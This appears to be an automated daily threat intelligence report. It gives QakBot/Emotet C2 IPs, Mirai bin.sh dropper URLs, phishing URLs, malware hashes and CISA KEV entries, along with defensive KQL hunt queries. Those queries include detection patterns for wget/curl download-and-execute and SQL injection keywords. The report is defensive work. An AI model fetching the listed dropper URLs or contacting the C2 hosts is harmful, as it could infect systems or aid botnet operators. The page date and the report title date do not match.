โ† Back to Dashboard
May 23, 2026

Daily Threat Intelligence Report โ€” 2025-07-14

28
IOCs
12
TTPs
12
KQL Queries
Executive Summary

Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed across five IPs by Feodotracker, representing an immediate risk to enterprise endpoints. A confirmed Mirai ELF sample (MalwareBazaar) is being distributed via at least ten malicious shell-script download URLs (URLhaus), signaling an active IoT/Linux botnet recruitment campaign. CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog โ€” including a critical Drupal Core SQL injection (CVE-2026-9082) and a Langflow CORS/RCE flaw (CVE-2025-34291) โ€” requiring immediate patching action. SOC teams should immediately block all five Feodotracker C2 IPs, patch or isolate Drupal and Langflow instances, and increase monitoring for outbound connections to URLhaus-listed hosts.

#1

Active QakBot & Emotet C2 Infrastructure โ€” Multi-Family Banking Trojan Campaign

CRITICAL TA505

Feodotracker has confirmed five active command-and-control servers operating in the last 24 hours: four serving QakBot (50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) and one serving Emotet (162.243.103.246). QakBot and Emotet are consistently leveraged by TA505 and affiliated initial-access brokers to establish persistent footholds that are subsequently monetized via ransomware deployment (e.g., Cl0p, BlackBasta). The geographic spread of C2 infrastructure across the US, UK, and Japan indicates deliberate infrastructure diversification to evade geo-based blocking. Any outbound connection to these IPs from an enterprise endpoint should be treated as a confirmed compromise requiring immediate isolation and full forensic investigation.

๐Ÿ”ด Indicators of Compromise
IP 162.243.103.246 Emotet C2 server hosted in US โ€” Feodotracker confirmed active
IP 50.16.16.211 QakBot C2 server hosted in US โ€” Feodotracker confirmed active
IP 34.204.119.63 QakBot C2 server hosted in US โ€” Feodotracker confirmed active
IP 178.62.3.223 QakBot C2 server hosted in GB โ€” Feodotracker confirmed active
IP 27.133.154.218 QakBot C2 server hosted in JP โ€” Feodotracker confirmed active
URL https://sfke-cahmcjf3b4fagvat.z03.azurefd.net/ Active phishing URL hosted on Azure Front Door โ€” OpenPhish confirmed, likely used for credential harvesting as initial access vector supporting downstream QakBot/Emotet delivery
URL http://wvwlistgtsfrsdrtosthts.fwh.is/ Active phishing URL โ€” OpenPhish confirmed
HASH faf9f58775b9eac12bfab1831fb52426110565e3059e18f119495072736586f0 PE executable dropped by GCleaner (tagged: dropped-by-GCleaner, exe, US.file) โ€” MalwareBazaar confirmed; GCleaner is a known pay-per-install loader used to distribute QakBot and similar banking trojans
๐ŸŸฃ MITRE ATT&CK TTPs
T1566.001 Spearphishing Attachment MITRE โ†’
T1071.001 Application Layer Protocol: Web Protocols MITRE โ†’
T1055 Process Injection MITRE โ†’
T1078 Valid Accounts MITRE โ†’
๐ŸŸข Hunt Queries
MDE Hunt for C2 connections to QakBot and Emotet infrastructure

Detects outbound network connections to all five Feodotracker-confirmed QakBot and Emotet C2 servers active in the last 24 hours.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Detect GCleaner dropper execution by hash

Identifies execution of the GCleaner-tagged dropper sample confirmed by MalwareBazaar as a QakBot distribution mechanism.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where SHA256 == 'faf9f58775b9eac12bfab1831fb52426110565e3059e18f119495072736586f0'
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessFileName, AccountName
| order by TimeGenerated desc
MDI Detect lateral movement patterns associated with TA505 post-QakBot compromise

Hunts for suspicious NTLM authentication patterns consistent with credential harvesting and lateral movement following a QakBot/Emotet compromise.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where Protocol == 'Ntlm'
| summarize LogonCount=count(), UniqueDevices=dcount(DeviceName) by AccountDisplayName, IPAddress
| where LogonCount > 5 or UniqueDevices > 3
| order by LogonCount desc
SENTINEL Detect connections to active phishing infrastructure linked to TA505 initial access

Identifies outbound connections to OpenPhish-confirmed phishing URLs used as initial access vectors preceding QakBot/Emotet delivery.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('sfke-cahmcjf3b4fagvat.z03.azurefd.net', 'wvwlistgtsfrsdrtosthts.fwh.is', 'kakefot735bezill.crabdance.com', 'saldonuturbinado.s3.us-east-005.backblazeb2.com')
| project TimeGenerated, SourceIP, DestinationHostName, RequestURL, Activity, DeviceVendor
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Block all five Feodotracker C2 IPs (162.243.103.246, 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) at perimeter firewall, proxy, and endpoint-level via EDR network control
โ†’ IMMEDIATE: Add MalwareBazaar hash faf9f58775b9eac12bfab1831fb52426110565e3059e18f119495072736586f0 to AV/EDR block list and scan all endpoints for historical execution
โ†’ IMMEDIATE: Block OpenPhish-confirmed phishing URLs at web proxy and email gateway; prioritize sfke-cahmcjf3b4fagvat.z03.azurefd.net and wvwlistgtsfrsdrtosthts.fwh.is
โ†’ SHORT-TERM: Execute all four KQL queries across MDE, MDI, and Sentinel; escalate any hits as Priority 1 incidents
โ†’ SHORT-TERM: Isolate any endpoint with confirmed outbound connection to the five C2 IPs and initiate full forensic collection
โ†’ SHORT-TERM: Brief SOC tier-1 analysts to treat any connection to the listed IPs as a confirmed compromise โ€” do not wait for additional corroboration
โ†’ LONG-TERM: Integrate Feodotracker C2 feed as an automated daily block-list update in firewall and proxy policy
โ†’ LONG-TERM: Implement email gateway rules to block GCleaner-associated attachment patterns (password-protected archives, double-extension files)
#2

Active Mirai Botnet Campaign โ€” Linux/IoT Shell Script Dropper Distribution via URLhaus

HIGH Unknown Threat Actor

MalwareBazaar has confirmed an active Mirai ELF binary (SHA256: a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da, tags: elf, Mirai) circulating alongside multiple shell-script (sh-tagged) samples, while URLhaus has simultaneously flagged ten malicious URLs actively serving bin.sh and similar dropper scripts from IPs across multiple Asian-Pacific ranges. This pattern is consistent with automated exploitation of exposed Linux services and IoT devices โ€” commonly targeting default credentials, Telnet, SSH, and unpatched RCE vulnerabilities โ€” to recruit devices into a DDoS botnet. The AlienVault OTX pulse 'Untangling a Linux Incident With an OpenAI Twist (Part 2)' corroborates simultaneous multi-actor Linux endpoint compromises including cryptominer deployment, suggesting these URLhaus drop-points may serve multiple payloads beyond Mirai. Organizations with internet-exposed Linux servers, NAS devices, routers, or IP cameras are at heightened risk and should audit for unauthorized outbound connections immediately.

๐Ÿ”ด Indicators of Compromise
HASH a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da Confirmed Mirai ELF binary โ€” MalwareBazaar tags: elf, Mirai โ€” active IoT/Linux botnet payload
HASH e82d0ea97861fe4efc9721ae95146aa14b2393a7b66110a4299e20b229d565d1 Shell script sample (tag: sh) โ€” MalwareBazaar confirmed โ€” likely Mirai dropper or installer script
HASH bb1d83bf2f3b09d9cd630ab0158b11c0dbced6df36d21a99e0ea723eda3bfd8c Shell script sample (tag: sh) โ€” MalwareBazaar confirmed โ€” likely Mirai dropper or installer script
HASH 10bbd20b2f26a8e93ac0c4df3cb4f9c6b984c40f64e93f80846439e7374d4ce4 Shell script sample (tag: sh) โ€” MalwareBazaar confirmed โ€” likely Mirai dropper or installer script
URL http://119.184.28.228:51291/bin.sh Active Mirai dropper delivery URL โ€” URLhaus confirmed malware_download
URL http://110.36.20.58:36809/bin.sh Active Mirai dropper delivery URL โ€” URLhaus confirmed malware_download
URL http://115.53.216.50:47211/bin.sh Active Mirai dropper delivery URL โ€” URLhaus confirmed malware_download
URL http://125.47.113.44:38895/bin.sh Active Mirai dropper delivery URL โ€” URLhaus confirmed malware_download
URL http://119.187.136.55:37418/i Active malware download URL โ€” URLhaus confirmed malware_download โ€” serving payload binary
URL http://39.90.151.181:39300/bin.sh Active Mirai dropper delivery URL โ€” URLhaus confirmed malware_download
URL https://paqcfwvt.winter-pulse.christmas/a754bad3-7e7b-479d-b307-bcbfcb2a933f Active malware download URL using holiday-themed domain โ€” URLhaus confirmed malware_download
URL http://115.55.8.145:60626/i Active malware download URL โ€” URLhaus confirmed malware_download
URL http://115.55.173.134:40180/bin.sh Active Mirai dropper delivery URL โ€” URLhaus confirmed malware_download
URL https://mokmgdal.gift-lattice.christmas/3e376a3d-065b-463f-93dd-8721c73c2e12 Active malware download URL using holiday-themed domain โ€” URLhaus confirmed malware_download
๐ŸŸฃ MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application MITRE โ†’
T1059.004 Command and Scripting Interpreter: Unix Shell MITRE โ†’
T1498 Network Denial of Service MITRE โ†’
T1110.001 Brute Force: Password Guessing MITRE โ†’
๐ŸŸข Hunt Queries
MDE Detect downloads from Mirai bin.sh distribution URLs

Identifies processes making network connections to URLhaus-confirmed Mirai dropper distribution IPs on the specific high ports observed in the campaign.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('119.184.28.228', '110.36.20.58', '115.53.216.50', '125.47.113.44', '119.187.136.55', '39.90.151.181', '115.55.8.145', '115.55.173.134')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Hunt for Mirai ELF binary and sh dropper execution by hash

Detects file creation or process execution events matching confirmed Mirai ELF and shell script dropper hashes from MalwareBazaar.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    'a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da',
    'e82d0ea97861fe4efc9721ae95146aa14b2393a7b66110a4299e20b229d565d1',
    'bb1d83bf2f3b09d9cd630ab0158b11c0dbced6df36d21a99e0ea723eda3bfd8c',
    '10bbd20b2f26a8e93ac0c4df3cb4f9c6b984c40f64e93f80846439e7374d4ce4'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName
| order by TimeGenerated desc
SENTINEL Detect connections to URLhaus-confirmed Mirai distribution infrastructure

Identifies any network traffic to the full set of URLhaus-confirmed Mirai dropper distribution URLs and their hosting IPs.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in ('119.184.28.228', '110.36.20.58', '115.53.216.50', '125.47.113.44', '119.187.136.55', '39.90.151.181', '115.55.8.145', '115.55.173.134')
    or RequestURL has_any ('bin.sh', 'gift-lattice.christmas', 'winter-pulse.christmas')
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor
| order by TimeGenerated desc
SENTINEL Detect wget/curl downloading shell scripts from non-standard ports on Linux endpoints

Hunts for command-line execution patterns consistent with Mirai dropper download-and-execute behavior observed in the URLhaus campaign.

Syslog
| where TimeGenerated > ago(24h)
| where SyslogMessage has_any ('wget', 'curl')
    and SyslogMessage has_any ('bin.sh', '/i ', 'chmod', '/tmp')
    and SyslogMessage matches regex @':(3[0-9]{4}|4[0-9]{4}|5[0-9]{4}|6[0-9]{4})/'
| project TimeGenerated, HostName, SyslogMessage, ProcessName
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Block all ten URLhaus-listed dropper distribution IPs and URLs at perimeter firewall, web proxy, and DNS filtering layers
โ†’ IMMEDIATE: Scan all Linux servers, NAS devices, and IoT assets for the four MalwareBazaar-confirmed hashes (Mirai ELF + sh droppers)
โ†’ IMMEDIATE: Audit internet-facing Linux and IoT devices for default credentials and disable Telnet (port 23) where not required
โ†’ SHORT-TERM: Execute all four KQL queries; any hit on Mirai hash or URLhaus IP should trigger immediate device isolation
โ†’ SHORT-TERM: Block holiday-themed domains gift-lattice.christmas and winter-pulse.christmas at DNS and proxy level โ€” these are confirmed malware distribution domains per URLhaus
โ†’ SHORT-TERM: Review network segmentation to ensure IoT and OT devices cannot directly reach internet-facing hosts or corporate segments
โ†’ LONG-TERM: Implement automated URLhaus feed integration into firewall and DNS blocklists with daily refresh
โ†’ LONG-TERM: Deploy network flow monitoring (NetFlow/IPFIX) on IoT network segments to detect DDoS participation and botnet scanning behavior
#3

CISA KEV Alert โ€” Critical Vulnerabilities in Drupal Core, Langflow, and Trend Micro Apex One Require Immediate Patching

MEDIUM Unknown Threat Actor

CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog, three of which present immediate high-severity risk to enterprise environments: CVE-2026-9082 (Drupal Core SQL injection enabling privilege escalation and RCE), CVE-2025-34291 (Langflow CORS misconfiguration with SameSite=None cookie allowing cross-origin credential theft and arbitrary code execution), and CVE-2026-34926 (Trend Micro Apex One directory traversal enabling malicious code injection to managed agents). Additionally, legacy vulnerabilities CVE-2008-4250 (Windows Server Service RPC buffer overflow) and CVE-2009-1537 (Microsoft DirectX QuickTime parser RCE) remain on the KEV list, indicating active exploitation of legacy systems still observed in the wild. All five require immediate mitigation per CISA BOD 22-01 guidance; organizations running Drupal CMS, Langflow AI pipelines, or Trend Micro Apex One on-premise should treat this as an emergency patching event. The Langflow vulnerability is particularly concerning given its presence in AI/ML development pipelines, which are increasingly targeted as entry points into sensitive data environments.

๐Ÿ”ด Indicators of Compromise
CVE CVE-2026-9082 Drupal Core SQL injection โ€” privilege escalation and RCE via database abstraction API โ€” CISA KEV confirmed actively exploited
CVE CVE-2025-34291 Langflow origin validation error โ€” overly permissive CORS with SameSite=None refresh token cookie enables cross-origin RCE โ€” CISA KEV confirmed actively exploited
CVE CVE-2026-34926 Trend Micro Apex One directory traversal โ€” pre-authenticated local attacker can inject malicious code deployed to all managed agents โ€” CISA KEV confirmed actively exploited
CVE CVE-2008-4250 Microsoft Windows Server Service buffer overflow via crafted RPC request โ€” remote code execution โ€” CISA KEV confirmed still actively exploited
CVE CVE-2009-1537 Microsoft DirectX QuickTime Movie Parser NULL byte overwrite โ€” remote code execution via crafted media file โ€” CISA KEV confirmed still actively exploited
URL http://soporcoabepmx-01--sopoortcobaepmx.replit.app/ Active phishing URL hosted on Replit โ€” OpenPhish confirmed โ€” representative of web-based delivery infrastructure that may deliver exploits for KEV vulnerabilities
๐ŸŸฃ MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application MITRE โ†’
T1068 Exploitation for Privilege Escalation MITRE โ†’
T1203 Exploitation for Client Execution MITRE โ†’
T1210 Exploitation of Remote Services MITRE โ†’
๐ŸŸข Hunt Queries
MDE Detect exploitation attempts against CVE-2008-4250 Windows Server Service RPC vulnerability

Hunts for Server Service (svchost) spawning unexpected child processes consistent with successful CVE-2008-4250 RPC buffer overflow exploitation.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where InitiatingProcessFileName =~ 'svchost.exe'
| where FileName in~ ('cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'rundll32.exe')
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessParentFileName, AccountName
| order by TimeGenerated desc
MDE Detect Trend Micro Apex One directory traversal exploitation (CVE-2026-34926)

Identifies suspicious file access or process activity on Apex One management servers consistent with directory traversal exploitation leading to malicious code injection to agents.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where InitiatingProcessFileName has_any ('TmListen.exe', 'PccNTMon.exe', 'ntrtscan.exe', 'TmCCSF.exe')
| where FolderPath has_any ('../', '..\')
    or FileName endswith '.exe' or FileName endswith '.dll'
| project TimeGenerated, DeviceName, FileName, FolderPath, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Detect SQL injection attempts against Drupal Core (CVE-2026-9082)

Identifies web requests to Drupal endpoints containing SQL injection patterns consistent with CVE-2026-9082 exploitation attempts.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('/drupal/', '/node/', '/user/', '?q=')
    and (RequestURL has_any ('UNION', 'SELECT', 'INSERT', 'DROP', 'SLEEP', '0x') 
         or AdditionalExtensions has_any ('UNION', 'SELECT', 'SLEEP'))
| project TimeGenerated, SourceIP, DestinationHostName, RequestURL, RequestMethod, AdditionalExtensions, Activity
| order by TimeGenerated desc
SENTINEL Detect Langflow cross-origin refresh token abuse (CVE-2025-34291)

Identifies anomalous cross-origin requests to Langflow refresh token endpoints that may indicate active exploitation of CVE-2025-34291.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('/api/v1/auth/refresh', '/refresh', '/token/refresh')
    and DestinationHostName has_any ('langflow', 'flow')
| extend OriginHeader = extract('Origin: ([^\r\n]+)', 1, AdditionalExtensions)
| where OriginHeader != '' and not(OriginHeader has DestinationHostName)
| project TimeGenerated, SourceIP, DestinationHostName, RequestURL, OriginHeader, Activity
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Patch or mitigate CVE-2026-9082 (Drupal Core) โ€” apply vendor security update immediately; if patch unavailable, apply WAF rules to block SQL injection patterns against Drupal endpoints and restrict database user privileges
โ†’ IMMEDIATE: Patch or mitigate CVE-2025-34291 (Langflow) โ€” update to patched version; if unavailable, restrict CORS configuration to trusted origins only and change SameSite cookie attribute to Strict or Lax
โ†’ IMMEDIATE: Patch or mitigate CVE-2026-34926 (Trend Micro Apex One on-premise) โ€” apply Trend Micro security update; until patched, restrict access to the Apex One management server console to trusted internal IPs only
โ†’ SHORT-TERM: Audit all Windows systems for CVE-2008-4250 patch status (MS08-067); any unpatched system should be isolated or have SMB/RPC access blocked via host firewall
โ†’ SHORT-TERM: Execute all four SENTINEL and MDE KQL queries to identify potential exploitation attempts in the last 24 hours; escalate any confirmed hits
โ†’ SHORT-TERM: Review Apex One management server logs for unexpected agent policy changes or file modifications in the last 7 days as a retroactive compromise check
โ†’ LONG-TERM: Integrate CISA KEV feed into vulnerability management platform for automated alerting when KEV additions affect assets in your environment
โ†’ LONG-TERM: Implement a 24-hour SLA for patching any vulnerability added to CISA KEV per BOD 22-01 requirements for federal agencies and as best practice for all organizations